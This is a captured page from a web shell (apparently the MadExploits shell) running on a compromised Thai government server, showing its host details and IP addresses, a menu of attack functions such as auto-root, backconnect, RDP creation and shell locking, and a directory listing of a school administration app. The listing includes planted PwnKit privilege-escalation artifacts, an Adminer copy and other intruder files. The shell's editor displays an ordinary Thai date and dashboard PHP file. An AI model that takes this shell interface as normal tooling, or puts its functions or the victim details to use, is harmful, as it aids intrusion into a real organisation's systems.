Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
FusionCharts
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
alert
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blocks
[ DIR ]
drwxr-xr-x
bootstrap-3.3.5-dist
[ DIR ]
drwxr-xr-x
bootstrap-4.3.1-dist
[ DIR ]
drwxr-xr-x
chart
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
datepicker_thaiyear
[ DIR ]
drwxr-xr-x
export
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
rss
[ DIR ]
drwxr-xr-x
signature
[ DIR ]
drwxr-xr-x
smss
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
aminfo.php
19
B
-rwxr-xr-x
amss_smss_book.pdf
6.75
MB
-rw-r--r--
amssplus_connect.php
410
B
-rwxr-xr-x
banner_manaul.png
1.57
MB
-rw-r--r--
change_os.php
124
B
-rwxr-xr-x
favicon.ico
555
B
-rw-r--r--
index.php
2.47
KB
-rw-r--r--
index0.html
4.67
KB
-rwxr-xr-x
index_blocks.php
4.09
KB
-rw-r--r--
index_desktop.php
5.26
KB
-rwxr-xr-x
index_desktop11.php
3.45
KB
-rwxr-xr-x
index_mobile.php
3.35
KB
-rwxr-xr-x
index_mobile.php.save
3.35
KB
-rw-------
index_mobile11.php
1.9
KB
-rwxr-xr-x
login.php
4.04
KB
-rw-r--r--
login_.php
3.89
KB
-rwxr-xr-x
login_2.php
8.46
KB
-rw-r--r--
logout.php
129
B
-rwxr-xr-x
logout2.php
65
B
-rwxr-xr-x
main_js.js
1.63
KB
-rwxr-xr-x
mainfile.php
902
B
-rwxr-xr-x
menu.php
4.53
KB
-rwxr-xr-x
menu_mobile.php
3.12
KB
-rwxr-xr-x
php_errors.log
165.81
MB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
smss_index.php
160
B
-rwxr-xr-x
ss.php
7.07
KB
-rwxr-xr-x
version.php
31
B
-rw-r--r--
zoomit.zip
294.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_blocks.php
<?php require_once "modules/car/time_inc.php"; $d_today = date("d"); $m_today = date("m"); $y_today = date("Y"); $Ymd_today = date("Y")."-".$m_today."-".$d_today; //ใช้ select book_date $mk_today = mktime(0, 0, 0, $m_today, $d_today, $y_today); //ค่าคำนวณวัน switch ( $m_today ) { case "01" : $mthai_today = "มกราคม"; break; case "02" : $mthai_today = "กุมภาพันธ์"; break; case "03" : $mthai_today = "มีนาคม"; break; case "04" : $mthai_today = "เมษายน"; break; case "05" : $mthai_today = "พฤษภาคม"; break; case "06" : $mthai_today = "มิถุนายน"; break; case "07" : $mthai_today = "กรกฎาคม"; break; case "08" : $mthai_today = "สิงหาคม"; break; case "09" : $mthai_today = "กันยายน"; break; case "10" : $mthai_today = "ตุลาคม"; break; case "11" : $mthai_today = "พฤศจิกายน"; break; case "12" : $mthai_today = "ธันวาคม"; break; } $today_thai = $d_today." ".$mthai_today." พ.ศ.".($y_today+543) ; $mk_tomorrow = $mk_today+(60*60*24); //ค่าคำนวณวันพรุ่งนี้ $Ymd_tomorrow =date("Y-m-d",$mk_tomorrow); //ใช้ select book_date $d_tomorrow = date("d",$mk_tomorrow); $m_tomorrow = date("m",$mk_tomorrow); $y_tomorrow = date("Y",$mk_tomorrow); switch ( $m_tomorrow ) { case "01" : $mthai_tomorrow = "มกราคม"; break; case "02" : $mthai_tomorrow = "กุมภาพันธ์"; break; case "03" : $mthai_tomorrow = "มีนาคม"; break; case "04" : $mthai_tomorrow = "เมษายน"; break; case "05" : $mthai_tomorrow = "พฤษภาคม"; break; case "06" : $mthai_tomorrow = "มิถุนายน"; break; case "07" : $mthai_tomorrow = "กรกฎาคม"; break; case "08" : $mthai_tomorrow = "สิงหาคม"; break; case "09" : $mthai_tomorrow = "กันยายน"; break; case "10" : $mthai_tomorrow = "ตุลาคม"; break; case "11" : $mthai_tomorrow = "พฤศจิกายน"; break; case "12" : $mthai_tomorrow = "ธันวาคม"; break; } $tomorrow_thai = $d_tomorrow." ".$mthai_tomorrow." พ.ศ.".($y_tomorrow+543) ; echo "<center>"; echo "<table width=100% border=0 cellspacing=\"10\" cellpadding=\"10\" align=\"center\">"; echo "<tr>"; //คอลัมภ์ 1/2 echo "<td valign='top'>"; //แจ้งเตือน require_once("modules/alert/main/warning.php"); //end แจ้งเตือน echo "<br>"; echo "<table width='98%' border=0 cellspacing=\"10\" cellpadding=\"10\" align=\"center\"><tr>"; echo "<td valign='top'>"; //ไปราชการ & ลา require_once("blocks/block-work-today.php"); //end ไปราชการ & ลา echo "</td>"; echo "</tr></table>"; //echo "<br>"; echo "<table width='98%' border=0 cellspacing=\"10\" cellpadding=\"10\" align=\"center\">"; echo "<tr>"; //คอลัมภ์ที่ 1/3 echo "<td valign='top'>"; //ทรัพย์สิน //require_once("blocks/block-asset.php"); //end ไปราชการ & ลา echo "</td>"; //คอลัมภ์ที่ 2/3 echo "<td width='33%' valign='top'>"; //การใช้ห้องประชุม require_once("blocks/block-meeting-today.php"); //end การใช้ห้องประชุม echo "</td>"; //คอลัมภ์ที่ 3/3 echo "<td width='33%' valign='top'>"; //การใช้ยานพาหนะ require_once("blocks/block-car-today.php"); //end การใช้ยานพาหนะ echo "</td>"; echo "</tr></table>"; echo "</td>"; //คอลัมภ์ 2/2 // echo "<td valign='top' width='25%'>"; //สุขสันต์วันเกิด // require_once("blocks/block-happybirthday.php"); //end สุขสันต์วันเกิด // echo "</td>"; echo "</tr>"; echo "</table>"; echo "</center>"; ?>
Close